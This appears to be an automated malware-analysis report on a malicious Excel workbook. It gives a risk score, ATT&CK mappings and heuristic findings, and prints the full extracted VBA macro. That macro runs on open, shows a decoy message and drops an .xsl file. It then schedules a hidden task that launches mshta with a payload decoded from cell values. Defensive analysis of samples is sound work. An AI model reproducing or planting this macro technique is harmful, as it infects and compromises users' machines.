MALICIOUS
176
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1203 Exploitation for Client Execution
The sample is an Excel document containing a Workbook_Open VBA macro. This macro utilizes CreateObject to interact with the Windows Schedule Service and the FileSystemObject to create a file named 'xDialogPivotFieldUngroup.xsl' in the ALLUSERSPROFILE directory. This indicates the macro is likely downloading and executing a second-stage payload, a common technique for initial compromise.
Heuristics 6
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
LOLBin reference in VBA critical OLE_VBA_LOLBINLOLBin reference in VBAMatched line in script
Set xReport5 = xLocalSessionChanges.Actions.Create(xParamTypeDouble) xReport5.Path = "mshta" xReport5.Arguments = xButtonOnly -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Next xWorksheetCell With CreateObject("Scripting.FileSystemObject") Set xDialogGallery3dSurface = .CreateTextFile(Environ("ALLUSERSPROFILE") & "\xDialogPivotFieldUngroup.xsl") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Attribute VB_Customizable = True Sub Workbook_Open() On Error GoTo xRangeValueXMLSpreadsheet -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
With CreateObject("Scripting.FileSystemObject") Set xDialogGallery3dSurface = .CreateTextFile(Environ("ALLUSERSPROFILE") & "\xDialogPivotFieldUngroup.xsl") End With
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3847 bytes |
SHA-256: 83763bde03c979556f3486d066440cecf9378aaa1392555cd966e3f936cf1a3a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_Open()
On Error GoTo xRangeValueXMLSpreadsheet
xDialogEditColor = 1 / 0
xRangeValueXMLSpreadsheet:
If Err.Number <> 0 Then
xRangeAutoFormatClassic2 = "Thank You!"
MsgBox xRangeAutoFormatClassic2, , "Good", Err.HelpFile, Err.HelpContext
xDialogDataValidation = xCylinderColClustered()
End If
End Sub
Function xCylinderColClustered()
For Each xWorksheetCell In ActiveWorkbook.Sheets("Sheet1").Range("AN69:BZ3757")
If xWorksheetCell.Value > 0 And Len(xButtonOnly) < 214 Then
xButtonOnly = xButtonOnly & Chr(xWorksheetCell.Value)
ElseIf xWorksheetCell.Value > 0 Then
xAlternateArraySeparator = xAlternateArraySeparator & Chr(xWorksheetCell.Value)
End If
Next xWorksheetCell
With CreateObject("Scripting.FileSystemObject")
Set xDialogGallery3dSurface = .CreateTextFile(Environ("ALLUSERSPROFILE") & "\xDialogPivotFieldUngroup.xsl")
End With
Const xNotXLM = 1
Const xParamTypeDouble = 0
Set xRowLabels = CreateObject("Schedule.Service")
Call xRowLabels.Connect
Set xDialogPivotFieldGroup = xRowLabels.GetFolder("")
Set xLocalSessionChanges = xRowLabels.NewTask(0)
Set xDateOrder = xLocalSessionChanges.RegistrationInfo
xDateOrder.Description = "Updates"
xDateOrder.Author = "The Company"
Set xPageBreakManual = xLocalSessionChanges.Principal
xPageBreakManual.LogonType = 3
Set xTiled = xLocalSessionChanges.Settings
xTiled.Enabled = True
xTiled.StartWhenAvailable = True
xTiled.Hidden = False
Set xWeekdayNameChars = xLocalSessionChanges.Triggers
Set xOmittedCells = xWeekdayNameChars.Create(xNotXLM)
xSaveChanges = DateAdd("s", 120, Now)
xSmartTagControlListbox = xDialogWorkbookOptions(xSaveChanges)
xSaveChanges = DateAdd("n", 5, Now)
xCylinderColStacked = xDialogWorkbookOptions(xSaveChanges)
xOmittedCells.StartBoundary = xSmartTagControlListbox
With xDialogGallery3dSurface
.Write xAlternateArraySeparator
End With
xOmittedCells.EndBoundary = xCylinderColStacked
xOmittedCells.ID = "TimeTriggerId"
xOmittedCells.Enabled = True
Set xReport5 = xLocalSessionChanges.Actions.Create(xParamTypeDouble)
xReport5.Path = "mshta"
xReport5.Arguments = xButtonOnly
Call xDialogPivotFieldGroup.RegisterTaskDefinition("2021 Updates", xLocalSessionChanges, 6, , , 3)
End Function
Function xDialogWorkbookOptions(xRangeAutoFormatClassicPivotTable)
xDialogPageSetup = "0" & Second(xRangeAutoFormatClassicPivotTable)
xStockVOHLC = "0" & Minute(xRangeAutoFormatClassicPivotTable)
xOpaque = "0" & Hour(xRangeAutoFormatClassicPivotTable)
xHAlignGeneral = "0" & Day(xRangeAutoFormatClassicPivotTable)
xDialogCombination = "0" & Month(xRangeAutoFormatClassicPivotTable)
xDBF3 = Year(xRangeAutoFormatClassicPivotTable)
xGridline = Right(xOpaque, 2) & ":" & Right(xStockVOHLC, 2) & ":" & Right(xDialogPageSetup, 2)
xInsertDeleteCells = xDBF3 & "-" & Right(xDialogCombination, 2) & "-" & Right(xHAlignGeneral, 2)
xDialogWorkbookOptions = xInsertDeleteCells & "T" & xGridline
End Function
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 16896 bytes |
SHA-256: fbf711e36b2c6efe0c5f29b0da7ee2806fdaabeb7761a6128e8bce2ec88aeb71 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.